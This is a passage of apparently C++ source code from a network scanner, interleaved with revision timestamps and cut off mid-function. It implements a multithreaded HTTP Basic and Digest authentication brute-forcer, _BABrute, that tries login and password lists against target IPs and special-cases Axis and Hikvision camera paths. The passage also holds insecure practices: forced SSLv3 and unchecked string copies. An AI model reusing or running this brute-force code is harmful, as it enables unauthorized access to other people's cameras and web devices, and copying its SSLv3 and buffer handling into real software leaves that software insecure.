2015-03-13 14:27:21 +00:00
# include " STh.h "
2015-02-24 14:00:19 +00:00
# include <libssh/libssh.h>
# include <sstream>
# include <openssl/md5.h>
# include "mainResources.h"
# include "externFunctions.h"
# include "externData.h"
# include <openssl/err.h>
2015-03-05 14:29:05 +00:00
# include <Utils.h>
2015-03-13 14:27:21 +00:00
# include <BruteUtils.h>
2015-02-24 14:00:19 +00:00
2015-02-25 07:43:21 +00:00
# if defined(WIN32) || defined(_WIN32) || defined(__WIN32) && !defined(__CYGWIN__)
2015-02-24 14:00:19 +00:00
# include <iphlpapi.h>
# include <icmpapi.h>
# pragma comment(lib, "iphlpapi.lib")
# endif
int gMaxBrutingThreads = 200 ;
fd_set write_fs ;
int _countFTPDirectories ( char * recvBuff ) {
if ( strcmp ( recvBuff , " dummy \r \n " ) = = 0 ) return 0 ;
int dirCounter = 0 ;
if ( recvBuff [ strlen ( recvBuff ) - 1 ] ! = ' \n ' ) strcat ( recvBuff , " \n " ) ;
char * dirPtr = strstr ( recvBuff , " \n " ) ;
while ( dirPtr ! = NULL ) {
+ + dirCounter ;
dirPtr = strstr ( dirPtr + 1 , " \n " ) ;
} ;
return dirCounter ;
2015-02-26 14:20:37 +00:00
}
2015-02-24 14:00:19 +00:00
bool debugWriteWait = false ;
void _DebugWriteHTMLToFile ( char * request , char * buff )
{
while ( debugWriteWait ) Sleep ( 50 ) ;
debugWriteWait = true ;
FILE * df = fopen ( " ./debugData.txt " , " a " ) ;
if ( df ! = NULL )
{
fputs ( request , df ) ;
fputs ( " ========================== \n " , df ) ;
fputs ( buff , df ) ;
fputs ( " \n ========================== \n ========================== \n \n " , df ) ;
fclose ( df ) ;
}
else
{
stt - > doEmitionRedFoundData ( " [DEBUG] Cannot open debugData.txt " ) ;
} ;
debugWriteWait = false ;
2015-02-24 14:14:32 +00:00
}
2015-02-26 14:20:37 +00:00
2015-02-24 14:00:19 +00:00
unsigned char tl ( unsigned char d )
{
if ( d > = 192 & & d < = 223 )
2015-03-02 14:27:38 +00:00
{
return ( unsigned char ) ( d + 32 ) ;
2015-02-24 14:00:19 +00:00
}
else
{
return tolower ( d ) ;
} ;
2015-02-26 14:20:37 +00:00
}
2015-02-24 14:00:19 +00:00
int recvWT (
int Socket ,
char * Buffer ,
int Len ,
long Timeout ,
int * bTimedOut
) {
fd_set ReadSet ;
int n ;
struct timeval Time ;
FD_ZERO ( & ReadSet ) ;
FD_SET ( Socket , & ReadSet ) ;
Time . tv_sec = Timeout ;
Time . tv_usec = 0 ;
2015-02-24 14:14:32 +00:00
* bTimedOut = false ;
2015-02-24 14:00:19 +00:00
n = select ( Socket + 1 , & ReadSet , NULL , NULL , & Time ) ;
if ( n > 0 ) { /* got some data */
return recv ( Socket , Buffer , Len , 0 ) ;
}
if ( n = = 0 ) { /* timeout */
2015-02-24 14:14:32 +00:00
* bTimedOut = true ;
2015-02-24 14:00:19 +00:00
}
return ( n ) ; /* trouble */
}
2015-02-26 14:20:37 +00:00
2015-02-24 14:00:19 +00:00
std : : string toLowerStr ( const char * str )
{
2015-03-02 14:27:38 +00:00
if ( str ! = NULL ) {
int tsz = strlen ( str ) ;
char * strr = new char [ tsz + 1 ] ;
ZeroMemory ( strr , tsz ) ;
2015-02-24 14:00:19 +00:00
2015-03-02 14:27:38 +00:00
for ( int i = 0 ; i < tsz ; i + + )
{
strr [ i ] = tl ( str [ i ] ) ;
} ;
2015-02-24 14:00:19 +00:00
2015-03-02 14:27:38 +00:00
memset ( strr + tsz , ' \0 ' , 1 ) ;
std : : string tstr = std : : string ( strr ) ;
delete [ ] strr ;
return tstr ;
} else return " " ;
// if(tsz == 1)
// {
// if(str[0] == 10) return "[No data!]";
// else return str;
// }
// else if(tsz > 1)
// {
// char * strr = new char[tsz+1];
// ZeroMemory(strr, tsz);
// for (int i = 0; i < tsz; i++)
// {
// strr[i] = tl(str[i]);
// };
// memset(strr + tsz, '\0', 1);
// std::string tstr = strr;
// delete []strr;
// return tstr;
// };
// return "";
2015-02-26 14:20:37 +00:00
}
2015-02-24 14:00:19 +00:00
int OpenConnection ( SOCKET * sock , const char * hostname , int port )
{
struct hostent * host ;
struct sockaddr_in addr ;
if ( strlen ( hostname ) = = 0 )
{
return - 1 ;
} ;
if ( port < 0 | | port > 65535 )
{
return - 1 ;
} ;
if ( ( host = gethostbyname ( hostname ) ) = = NULL )
{
+ + offlines ;
if ( gNegDebugMode ) stt - > doEmitionDebugFoundData ( " [<a href= \" http:// " + QString ( hostname ) + " : " + QString : : number ( port ) + " / \" ><font color= \" #0084ff \" > " + QString ( hostname ) + " : " + QString : : number ( port ) + " </font></a> " + " ] Rejecting in _connection: Bad IP. " ) ;
return - 1 ;
} ;
* sock = socket ( PF_INET , SOCK_STREAM , 0 ) ;
ZeroMemory ( & addr , sizeof ( addr ) ) ;
addr . sin_family = AF_INET ;
addr . sin_port = htons ( port ) ;
addr . sin_addr . s_addr = * ( long * ) ( host - > h_addr ) ;
if ( connect ( * sock , ( struct sockaddr * ) & addr , sizeof ( addr ) ) = = SOCKET_ERROR )
{
+ + offlines ;
CSSOCKET ( * sock ) ;
return - 1 ;
} ;
return 0 ;
}
void _baSSLWorker ( char * ip , char * request , char * rvBuff )
{
const SSL_METHOD * method = SSLv3_client_method ( ) ; /* Create new client-method instance */
SSL_CTX * ctx = SSL_CTX_new ( method ) ; /* Create new context */
if ( ctx ! = NULL )
{
SOCKET sock ;
SSL_CTX_set_timeout ( ctx , gTimeOut ) ;
int result = OpenConnection ( & sock , ip , 443 ) ;
if ( result > = 0 )
{
SSL * ssl = NULL ;
ssl = SSL_new ( ctx ) ; /* create new SSL connection state */
if ( ssl ! = NULL )
{
SSL_set_fd ( ssl , sock ) ; /* attach the socket descriptor */
if ( SSL_connect ( ssl ) )
{
SSL_write ( ssl , request , strlen ( request ) ) ;
2015-03-10 20:09:05 +00:00
if ( MapWidgetOpened ) stt - > doEmitionAddOutData ( QString ( request ) ) ;
2015-02-24 14:00:19 +00:00
char tempBuff [ 128 ] = { 0 } ;
int x = 1 ;
int xx = 0 ;
2015-03-10 14:35:50 +00:00
ZeroMemory ( rvBuff , sizeof ( * rvBuff ) ) ;
2015-02-24 14:00:19 +00:00
while ( xx < 512 )
{
x = SSL_read ( ssl , tempBuff , sizeof ( tempBuff ) ) ;
if ( x < = 0 ) break ;
Activity + = x ;
xx + = x ;
strncat ( rvBuff , tempBuff , x ) ;
ZeroMemory ( tempBuff , sizeof ( tempBuff ) ) ;
} ;
if ( MapWidgetOpened ) stt - > doEmitionAddIncData ( QString ( ip ) , QString ( rvBuff ) ) ;
if ( HTMLDebugMode ) _DebugWriteHTMLToFile ( request , rvBuff ) ;
} ;
SSL_shutdown ( ssl ) ;
SSL_free ( ssl ) ;
CSSOCKET ( sock ) ;
SSL_CTX_free ( ctx ) ; /* release context */
return ;
} ;
} ;
CSSOCKET ( sock ) ;
SSL_CTX_free ( ctx ) ; /* release context */
}
else
{
char buff1 [ 512 ] = { 0 } ;
char buff2 [ 512 ] = { 0 } ;
ERR_error_string ( ERR_peek_error ( ) , buff1 ) ;
ERR_error_string ( ERR_peek_last_error ( ) , buff2 ) ;
stt - > doEmitionRedFoundData ( QString ( ip ) + " SSL(InitCTX) 1: " + QString ( buff1 ) + " 2: " + QString ( buff2 ) ) ;
} ;
2015-02-26 14:20:37 +00:00
}
2015-02-24 14:00:19 +00:00
char * _getAttributeValue ( char * str , char * val , char * ip , int port )
{
char res [ 1024 ] = { 0 } ;
char * ptrStart = NULL ;
char * ptrS1End = NULL ;
char * ptrS2End = NULL ;
ptrStart = strstri ( str , val ) ;
if ( ptrStart ! = NULL )
{
if ( strstri ( ptrStart , " qop=auth " ) ! = NULL ) return " auth " ;
2015-03-10 16:46:14 +00:00
ptrS1End = _findFirst ( ptrStart , " \" " ) ;
2015-02-24 14:00:19 +00:00
if ( ptrS1End ! = NULL )
{
2015-03-10 16:46:14 +00:00
ptrS2End = _findFirst ( ptrS1End + 1 , " \" " ) ;
2015-02-24 14:00:19 +00:00
if ( ptrS2End ! = NULL )
{
int sz = ptrS2End - ptrS1End - 1 ;
if ( sz ! = 0 & & sz < 1024 ) strncpy ( res , ptrS1End + 1 , sz ) ;
else return " " ;
return res ;
}
else
{
stt - > doEmitionRedFoundData ( " [_getAttributeValue] Error retrieving value: \" " + QString ( val ) + " \" IP:<a style= \" color:#819121; \" href= \" http:// " + QString ( ip ) + " : " + QString : : number ( port ) + " / \" > " + QString ( ip ) + " : " + QString : : number ( port ) + " </a> " ) ;
return " " ;
} ;
}
else
{
stt - > doEmitionRedFoundData ( " [_getAttributeValue] Error retrieving value: \" " + QString ( val ) + " \" IP:<a style= \" color:#919121; \" href= \" http:// " + QString ( ip ) + " : " + QString : : number ( port ) + " / \" > " + QString ( ip ) + " : " + QString : : number ( port ) + " </a> " ) ;
return " " ;
} ;
}
else
{
stt - > doEmitionRedFoundData ( " [_getAttributeValue] Error retrieving value: \" " + QString ( val ) + " \" IP:<a style= \" color:#819121; \" href= \" http:// " + QString ( ip ) + " : " + QString : : number ( port ) + " / \" > " + QString ( ip ) + " : " + QString : : number ( port ) + " </a> " ) ;
return " " ;
} ;
2015-02-26 14:20:37 +00:00
}
2015-02-24 14:00:19 +00:00
# define HASHLEN 16
typedef char HASH [ HASHLEN ] ;
# define HASHHEXLEN 32
typedef char HASHHEX [ HASHHEXLEN + 1 ] ;
# define IN
# define OUT
void CvtHex (
IN HASH Bin ,
OUT HASHHEX Hex
)
{
unsigned short i ;
unsigned char j ;
for ( i = 0 ; i < HASHLEN ; i + + ) {
j = ( Bin [ i ] > > 4 ) & 0xf ;
if ( j < = 9 )
Hex [ i * 2 ] = ( j + ' 0 ' ) ;
else
Hex [ i * 2 ] = ( j + ' a ' - 10 ) ;
j = Bin [ i ] & 0xf ;
if ( j < = 9 )
Hex [ i * 2 + 1 ] = ( j + ' 0 ' ) ;
else
Hex [ i * 2 + 1 ] = ( j + ' a ' - 10 ) ;
} ;
Hex [ HASHHEXLEN ] = ' \0 ' ;
} ;
char * _makeDigestResponse (
char * login ,
char * realm ,
char * pass ,
char * path ,
char * nonce ,
char * pszNonceCount ,
char * pszCNonce ,
char * pszQop
)
{
char HA1 [ MD5_DIGEST_LENGTH ] ;
char HA2 [ MD5_DIGEST_LENGTH ] ;
char HA1Data [ 512 ] = { 0 } ;
char HA2Data [ 512 ] = { 0 } ;
strcpy ( HA1Data , login ) ;
strcat ( HA1Data , " : " ) ;
strcat ( HA1Data , realm ) ;
strcat ( HA1Data , " : " ) ;
strcat ( HA1Data , pass ) ;
strcpy ( HA2Data , " GET: " ) ;
strcat ( HA2Data , path ) ;
MD5 ( ( unsigned char * ) HA1Data , strlen ( HA1Data ) , ( unsigned char * ) HA1 ) ;
MD5 ( ( unsigned char * ) HA2Data , strlen ( HA2Data ) , ( unsigned char * ) HA2 ) ;
char responseData [ 512 ] = { 0 } ;
char * HA1MD5 = new char [ 64 ] ;
char * HA2MD5 = new char [ 64 ] ;
ZeroMemory ( HA1MD5 , 64 ) ;
ZeroMemory ( HA2MD5 , 64 ) ;
CvtHex ( HA1 , HA1MD5 ) ;
strcpy ( responseData , HA1MD5 ) ;
strcat ( responseData , " : " ) ;
strcat ( responseData , nonce ) ;
strcat ( responseData , " : " ) ;
if ( * pszQop ! = NULL ) {
strcat ( responseData , pszNonceCount ) ;
strcat ( responseData , " : " ) ;
strcat ( responseData , pszCNonce ) ;
strcat ( responseData , " : " ) ;
strcat ( responseData , pszQop ) ;
strcat ( responseData , " : " ) ;
} ;
CvtHex ( HA2 , HA2MD5 ) ;
strcat ( responseData , HA2MD5 ) ;
delete [ ] HA1MD5 ;
delete [ ] HA2MD5 ;
char response [ MD5_DIGEST_LENGTH ] ;
MD5 ( ( unsigned char * ) responseData , strlen ( responseData ) , ( unsigned char * ) response ) ;
char responseMD5 [ 64 ] = { 0 } ;
CvtHex ( response , responseMD5 ) ;
return ( char * ) responseMD5 ;
2015-02-26 14:20:37 +00:00
}
2015-02-24 14:00:19 +00:00
lopaStr _BABrute ( char * cookie , char * ip , int port , char * pathT , char * method )
{
if ( strcmp ( method , " [DIGEST] " ) ! = 0 & & strcmp ( method , " [NORMAL] " ) ! = 0 ) stt - > doEmitionRedFoundData ( " [-] Unknown method IP: <a style= \" color: #efe100; \" href= \" http:// " + QString ( ip ) + " : " + QString : : number ( port ) + " \" > " + QString ( ip ) + " : " + QString : : number ( port ) + + " </a> " ) ;
lopaStr lps ;
ZeroMemory ( lps . login , sizeof ( lps . login ) ) ;
ZeroMemory ( lps . pass , sizeof ( lps . pass ) ) ;
ZeroMemory ( lps . other , sizeof ( lps . other ) ) ;
int cookieLen = strlen ( cookie ) ;
char path [ 512 ] = { 0 } ;
strncpy ( path , pathT , 512 ) ;
int bTO ;
bool goon = false ;
char hRqst [ REQUEST_MAX_SIZE ] = { 0 } ;
2015-02-28 11:47:21 +00:00
char headerMsg [ REQUEST_MAX_SIZE ] = { 0 } ;
2015-02-24 14:00:19 +00:00
char hMsgR [ 512 ] = { 0 } ;
strcpy ( hRqst , " GET " ) ;
strcat ( hRqst , path ) ;
strcat ( hRqst , " HTTP/1.1 \r \n Host: " ) ;
strcat ( hRqst , ip ) ;
2015-02-24 14:14:32 +00:00
2015-02-24 14:00:19 +00:00
if ( port ! = 80 ) {
strcat ( hRqst , " : " ) ;
char tbuff [ 16 ] = { 0 } ;
2015-02-24 14:14:32 +00:00
sprintf ( tbuff , " %d " , port ) ;
strcat ( hRqst , tbuff ) ;
2015-02-24 14:00:19 +00:00
} ;
2015-02-24 14:14:32 +00:00
2015-02-24 14:00:19 +00:00
if ( cookieLen ! = 0 )
{
strcat ( hRqst , " \r \n Cookie: " ) ;
strcat ( hRqst , cookie ) ;
} ;
strcat ( hRqst , " \r \n User-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11 \r \n Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 \r \n Accept-Language: en-US,ru;q=0.9,en;q=0.8 \r \n Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 \r \n Accept-Encoding: text, identity, *;q=0 \r \n Authorization: Basic bG9sa2E6bG9sa2F= \r \n \r \n " ) ;
2015-02-24 14:14:32 +00:00
sockaddr_in sockAddr ;
2015-02-24 14:00:19 +00:00
if ( port = = 443 )
{
ZeroMemory ( headerMsg , REQUEST_MAX_SIZE ) ;
_baSSLWorker ( ip , hRqst , headerMsg ) ;
}
2015-02-24 14:14:32 +00:00
else
2015-02-24 14:00:19 +00:00
{
SOCKET sock ;
sockAddr . sin_family = AF_INET ;
sockAddr . sin_port = htons ( port ) ;
HOSTENT * host ;
# if defined(WIN32) || defined(_WIN32) || defined(__WIN32) && !defined(__CYGWIN__)
if ( inet_addr ( ip ) ! = INADDR_NONE ) sockAddr . sin_addr . S_un . S_addr = inet_addr ( ip ) ;
else if ( host = gethostbyname ( ip ) ) ( ( unsigned long * ) & sockAddr . sin_addr ) [ 0 ] = ( ( unsigned long * * ) host - > h_addr_list ) [ 0 ] [ 0 ] ;
else
{
isActive = 0 ;
strcpy ( lps . login , " UNKNOWN " ) ;
return lps ;
} ;
# else
if ( inet_addr ( ip ) ! = INADDR_NONE ) sockAddr . sin_addr . s_addr = inet_addr ( ip ) ;
else if ( host = gethostbyname ( ip ) ) ( ( unsigned long * ) & sockAddr . sin_addr ) [ 0 ] = ( ( unsigned long * * ) host - > h_addr_list ) [ 0 ] [ 0 ] ;
else
{
isActive = 0 ;
strcpy ( lps . login , " UNKNOWN " ) ;
return lps ;
} ;
# endif
sock = socket ( AF_INET , SOCK_STREAM , IPPROTO_TCP ) ;
if ( sock ! = INVALID_SOCKET ) {
if ( connect ( sock , ( sockaddr * ) & sockAddr , sizeof ( sockAddr ) ) ! = SOCKET_ERROR ) {
if ( send ( sock , hRqst , strlen ( hRqst ) , 0 ) ! = SOCKET_ERROR ) {
2015-03-10 20:09:05 +00:00
if ( MapWidgetOpened ) stt - > doEmitionAddOutData ( QString ( hRqst ) ) ;
2015-02-24 14:00:19 +00:00
ZeroMemory ( headerMsg , REQUEST_MAX_SIZE ) ;
int x = 1 ;
int xx = 0 ;
2015-02-28 11:47:21 +00:00
while ( xx < REQUEST_MAX_SIZE )
2015-02-24 14:00:19 +00:00
{
x = recvWT ( sock , hMsgR , sizeof ( hMsgR ) , gTimeOut + 5 , & bTO ) ;
if ( x < = 0 ) break ;
strncat ( headerMsg , hMsgR , x ) ;
xx + = x ;
ZeroMemory ( hMsgR , sizeof ( hMsgR ) ) ;
} ;
if ( MapWidgetOpened ) stt - > doEmitionAddIncData ( QString ( ip ) , QString ( headerMsg ) ) ;
} else {
if ( gDebugMode ) stt - > doEmitionDebugFoundData ( " [BA::Send]: " + QString : : number ( WSAGetLastError ( ) ) ) ;
} ;
} else {
if ( gDebugMode ) stt - > doEmitionDebugFoundData ( " [BA::Connect]: " + QString : : number ( WSAGetLastError ( ) ) ) ;
} ;
} else {
if ( gDebugMode ) stt - > doEmitionDebugFoundData ( " [BA: Invalid socket]: " + QString : : number ( WSAGetLastError ( ) ) ) ;
} ;
CSSOCKET ( sock ) ;
} ;
2015-02-24 14:14:32 +00:00
2015-02-24 14:00:19 +00:00
if ( strlen ( headerMsg ) = = 0 )
{
isActive = 0 ;
strcpy ( lps . login , " UNKNOWN " ) ;
return lps ;
} ;
if ( strstr ( headerMsg , " 401 " ) = = NULL
& & strstr ( headerMsg , " .1 401 " ) = = NULL
& & strstr ( headerMsg , " .0 401 " ) = = NULL
& & strstr ( headerMsg , " <statusValue>401</statusValue> " ) = = NULL
& & strstr ( headerMsg , " <statusString>Unauthorized</statusString> " ) = = NULL
2015-02-28 11:47:21 +00:00
& & strstr ( headerMsg , " неправильны " ) = = NULL & & strstr ( headerMsg , " Неправильны " ) = = NULL
& & strstr ( headerMsg , " Неправильны " ) = = NULL
2015-02-24 14:00:19 +00:00
)
{
if ( strstri ( headerMsg , " 400 Bad " ) ! = NULL )
{
strcpy ( lps . other , " [400 Bad Request] " ) ;
isActive = 0 ;
return lps ;
}
else if ( strstri ( headerMsg , " 404 Not " ) ! = NULL
| | strstr ( headerMsg , " 404 " ) ! = NULL
| | strstr ( headerMsg , " .1 404 " ) ! = NULL
| | strstr ( headerMsg , " .0 404 " ) ! = NULL
)
{
if ( strstr ( path , " /axis-cgi/com/ptz.cgi? " ) ! = NULL )
{
int sz = strlen ( " /view/viewer_index.shtml " ) ;
strncpy ( path , " /view/viewer_index.shtml " , sz ) ;
memset ( path + sz , 0 , 1 ) ;
goon = true ;
}
else
{
strcpy ( lps . other , QString ( " [404 Not Found ( " + QString ( path ) + " )] " ) . toLocal8Bit ( ) . data ( ) ) ;
isActive = 0 ;
return lps ;
} ;
}
else if ( //
( strstr ( headerMsg , " .1 403 " ) ! = NULL //
| | strstr ( headerMsg , " .0 403 " ) ! = NULL //Hikkvision2
) //
& & strstr ( headerMsg , " badAuthorization " ) ! = NULL //
)
{
goon = true ;
}
else if ( strlen ( headerMsg ) < 16 )
{
goon = true ;
stt - > doEmitionRedFoundData ( " Corrupted reply: ( " + QString ( headerMsg ) + " ) " + QString ( ip ) + " : " + QString : : number ( port ) ) ;
} ;
if ( goon = = false )
{
strcpy ( lps . login , " NULL " ) ;
strcpy ( lps . pass , " NULL " ) ;
isActive = 0 ;
return lps ;
} ;
} ;
2015-02-24 14:14:32 +00:00
2015-02-24 14:00:19 +00:00
isActive = 1 ;
char tPass [ 256 ] = { 0 } ;
char curLogin [ 256 ] = { 0 } ;
char curPass [ 256 ] = { 0 } ;
2015-02-27 13:55:35 +00:00
int cCode ;
2015-02-24 14:00:19 +00:00
int dataSz = 0 ;
char request [ REQUEST_MAX_SIZE ] = { 0 } ;
char recvBuff [ 4096 ] = { 0 } ;
char recvBuff2 [ 512 ] = { 0 } ;
2015-02-27 13:55:35 +00:00
char pass [ 256 ] = { 0 } ;
2015-02-24 14:00:19 +00:00
char localBuff [ 4096 ] = { 0 } ;
strcpy ( localBuff , headerMsg ) ;
int passCounter = 1 ;
char attribute [ 2048 ] = { 0 } ;
char nonce [ 512 ] = { 0 } ;
char realm [ 512 ] = { 0 } ;
char opaque [ 512 ] = { 0 } ;
char qop [ 64 ] = { 0 } ;
std : : string encoded = " " ;
for ( int i = 0 ; i < MaxLogin ; i + + )
{
if ( globalScanFlag = = false ) break ;
2015-02-28 11:47:21 +00:00
for ( int j = 0 ; j < MaxPass ; j + + )
2015-02-24 14:00:19 +00:00
{
2015-02-28 11:47:21 +00:00
if ( globalScanFlag = = false ) break ;
2015-02-24 14:00:19 +00:00
ZeroMemory ( request , REQUEST_MAX_SIZE ) ;
ZeroMemory ( curLogin , sizeof ( curLogin ) ) ;
ZeroMemory ( curPass , sizeof ( curPass ) ) ;
strcpy ( curLogin , loginLst [ i ] ) ;
strcpy ( curPass , passLst [ j ] ) ;
2015-02-28 11:47:21 +00:00
if ( strcmp ( method , " [DIGEST] " ) = = 0 & & strstr ( localBuff , " nonce= " ) ! = NULL )
2015-02-24 14:00:19 +00:00
{
ZeroMemory ( attribute , sizeof ( attribute ) ) ;
2015-03-07 17:31:48 +00:00
// strcpy(attribute, _getAttribute(localBuff, "WWW-Authenticate:"));
2015-02-24 14:00:19 +00:00
ZeroMemory ( nonce , sizeof ( nonce ) ) ;
strcpy ( nonce , _getAttributeValue ( attribute , " nonce= " , ip , port ) ) ;
ZeroMemory ( realm , sizeof ( realm ) ) ;
strcpy ( realm , _getAttributeValue ( attribute , " realm= " , ip , port ) ) ;
ZeroMemory ( qop , sizeof ( qop ) ) ;
2015-02-28 11:47:21 +00:00
if ( strstri ( attribute , " qop " ) ! = NULL )
2015-02-24 14:00:19 +00:00
{
strcpy ( qop , _getAttributeValue ( attribute , " qop= " , ip , port ) ) ;
} ;
strcpy ( request , " GET " ) ;
strcat ( request , path ) ;
strcat ( request , " HTTP/1.1 \r \n Host: " ) ;
strcat ( request , ip ) ;
2015-02-28 11:47:21 +00:00
if ( port ! = 80 ) {
2015-02-24 14:00:19 +00:00
strcat ( request , " : " ) ;
2015-02-28 11:47:21 +00:00
char tbuff [ 16 ] = { 0 } ;
sprintf ( tbuff , " %d " , port ) ;
strcat ( request , tbuff ) ;
2015-02-24 14:00:19 +00:00
} ;
2015-02-28 11:47:21 +00:00
if ( cookieLen ! = 0 )
2015-02-24 14:00:19 +00:00
{
strcat ( request , " \r \n Cookie: " ) ;
strcat ( request , cookie ) ;
} ;
2015-02-28 11:47:21 +00:00
strcat ( request , " \r \n User-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11 \r \n Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 \r \n Accept-Language: en-US,ru;q=0.9,en;q=0.8 \r \n Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 \r \n Accept-Encoding: text, identity, *;q=0 \r \n Authorization: Digest username= \" " ) ;
2015-02-24 14:00:19 +00:00
strcat ( request , curLogin ) ;
strcat ( request , " \" , realm= \" " ) ;
strcat ( request , realm ) ;
strcat ( request , " \" , nonce= \" " ) ;
strcat ( request , nonce ) ;
strcat ( request , " \" , uri= \" " ) ;
strcat ( request , path ) ;
strcat ( request , " \" , qop=auth, response= \" " ) ;
strcat ( request , _makeDigestResponse ( curLogin , realm , curPass , path , nonce , " 10000001 " , " 9d531d56796e0dc9 " , qop ) ) ;
2015-02-28 11:47:21 +00:00
if ( strstri ( attribute , " opaque " ) ! = NULL )
2015-02-24 14:00:19 +00:00
{
ZeroMemory ( opaque , sizeof ( opaque ) ) ;
strcpy ( opaque , _getAttributeValue ( attribute , " opaque= " , ip , port ) ) ;
strcat ( request , " \" , opaque= \" " ) ;
strcat ( request , opaque ) ;
} ;
strcat ( request , " \" , nc=10000001, cnonce= \" 9d531d56796e0dc9 \" " ) ;
strcat ( request , " \r \n Connection: close \r \n \r \n " ) ;
}
else
{
ZeroMemory ( tPass , sizeof ( tPass ) ) ;
strncpy ( tPass , curLogin , strlen ( curLogin ) ) ;
strcat ( tPass , " : " ) ;
strncat ( tPass , curPass , strlen ( curPass ) ) ;
encoded = base64_encode ( ( const unsigned char * ) tPass , strlen ( tPass ) ) ;
strcpy ( request , " GET " ) ;
strcat ( request , path ) ;
strcat ( request , " HTTP/1.1 \r \n Host: " ) ;
strcat ( request , ip ) ;
2015-02-28 11:47:21 +00:00
if ( port ! = 80 ) {
2015-02-24 14:00:19 +00:00
strcat ( request , " : " ) ;
2015-02-28 11:47:21 +00:00
char tbuff [ 16 ] = { 0 } ;
sprintf ( tbuff , " %d " , port ) ;
strcat ( request , tbuff ) ;
2015-02-24 14:00:19 +00:00
} ;
2015-02-28 11:47:21 +00:00
if ( cookieLen ! = 0 )
2015-02-24 14:00:19 +00:00
{
strcat ( request , " \r \n Cookie: " ) ;
strcat ( request , cookie ) ;
} ;
2015-02-28 11:47:21 +00:00
strcat ( request , " \r \n User-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11 \r \n Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 \r \n Accept-Language: en-US,ru;q=0.9,en;q=0.8 \r \n Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 \r \n Accept-Encoding: text, identity, *;q=0 \r \n Authorization: Basic " ) ;
2015-02-24 14:00:19 +00:00
strcat ( request , encoded . c_str ( ) ) ;
strcat ( request , " \r \n Connection: close \r \n \r \n " ) ;
} ;
2015-02-24 14:14:32 +00:00
2015-02-28 11:47:21 +00:00
if ( port = = 443 )
2015-02-24 14:00:19 +00:00
{
ZeroMemory ( recvBuff , sizeof ( recvBuff ) ) ;
2015-02-28 11:47:21 +00:00
if ( BALogSwitched ) stt - > doEmitionBAData ( " Probing SSL:BA " + QString ( ip ) + " : " + QString : : number ( port ) + " ; login/pass: " + QString ( tPass ) + " ; " ) ;
2015-02-24 14:00:19 +00:00
_baSSLWorker ( ip , request , recvBuff ) ;
dataSz = strlen ( recvBuff ) ;
}
2015-02-24 14:14:32 +00:00
2015-02-28 11:47:21 +00:00
else
2015-02-24 14:00:19 +00:00
{
2015-02-28 11:47:21 +00:00
SOCKET sock = socket ( AF_INET , SOCK_STREAM , IPPROTO_TCP ) ;
2015-02-24 14:00:19 +00:00
cCode = connect ( sock , ( sockaddr * ) & sockAddr , sizeof ( sockAddr ) ) ;
2015-02-28 11:47:21 +00:00
if ( cCode = = SOCKET_ERROR ) {
2015-02-24 14:00:19 +00:00
int errorCode = WSAGetLastError ( ) ;
2015-02-28 11:47:21 +00:00
if ( errorCode = = WSAENOTSOCK ) {
2015-02-24 14:00:19 +00:00
2015-02-28 11:47:21 +00:00
while ( errorCode = = WSAENOTSOCK )
2015-02-24 14:00:19 +00:00
{
2015-02-28 11:47:21 +00:00
if ( gDebugMode ) stt - > doEmitionDebugFoundData ( " [BA][ENOTSOCK] - [ " + QString ( ip ) + " : " + QString : : number ( port ) + " ] " ) ;
2015-02-24 14:00:19 +00:00
CSSOCKET ( sock ) ;
2015-02-28 11:47:21 +00:00
sock = socket ( AF_INET , SOCK_STREAM , IPPROTO_TCP ) ;
2015-02-24 14:00:19 +00:00
cCode = connect ( sock , ( sockaddr * ) & sockAddr , sizeof ( sockAddr ) ) ;
errorCode = WSAGetLastError ( ) ;
} ;
2015-02-28 11:47:21 +00:00
}
else {
2015-02-24 14:00:19 +00:00
CSSOCKET ( sock ) ;
2015-02-28 11:47:21 +00:00
if ( errorCode ! = WSAETIMEDOUT )
2015-02-24 14:00:19 +00:00
{
stt - > doEmitionRedFoundData ( " [BA] Cannot connect to " + QString ( ip ) + " [ " + QString : : number ( errorCode ) + " ] " ) ;
} ;
isActive = 0 ;
strcpy ( lps . login , " UNKNOWN " ) ;
return lps ;
} ;
2015-02-28 11:47:21 +00:00
}
else {
2015-02-24 14:00:19 +00:00
int x = 1 ;
Activity + = strlen ( request ) ;
2015-02-28 11:47:21 +00:00
if ( send ( sock , request , strlen ( request ) , 0 ) ! = SOCKET_ERROR )
2015-02-24 14:00:19 +00:00
{
2015-03-10 20:09:05 +00:00
if ( MapWidgetOpened ) stt - > doEmitionAddOutData ( QString ( request ) ) ;
2015-02-24 14:00:19 +00:00
dataSz = 0 ;
ZeroMemory ( recvBuff2 , sizeof ( recvBuff2 ) ) ;
ZeroMemory ( recvBuff , sizeof ( recvBuff ) ) ;
2015-02-28 11:47:21 +00:00
while ( x > 0 & & dataSz < 3384 )
2015-02-24 14:00:19 +00:00
{
ZeroMemory ( recvBuff2 , sizeof ( recvBuff2 ) ) ;
x = recvWT ( sock , recvBuff2 , sizeof ( recvBuff2 ) , gTimeOut + 5 , & bTO ) ;
dataSz + = x ;
Activity + = x ;
strncat ( recvBuff , recvBuff2 , x ) ;
} ;
2015-02-28 11:47:21 +00:00
if ( BALogSwitched ) stt - > doEmitionBAData ( " Checked BA: " + QString ( ip ) + " : " + QString : : number ( port ) + " ; login/pass: " + QString ( curLogin ) + " : " + QString ( curPass ) + " ; - Progress: ( " + QString : : number ( ( passCounter / ( double ) ( MaxPass * MaxLogin ) ) * 100 ) . mid ( 0 , 4 ) + " %) " ) ;
2015-02-24 14:00:19 +00:00
}
else
{
stt - > doEmitionRedFoundData ( " [BA] Send error! [ " + QString ( ip ) + " ] " ) ;
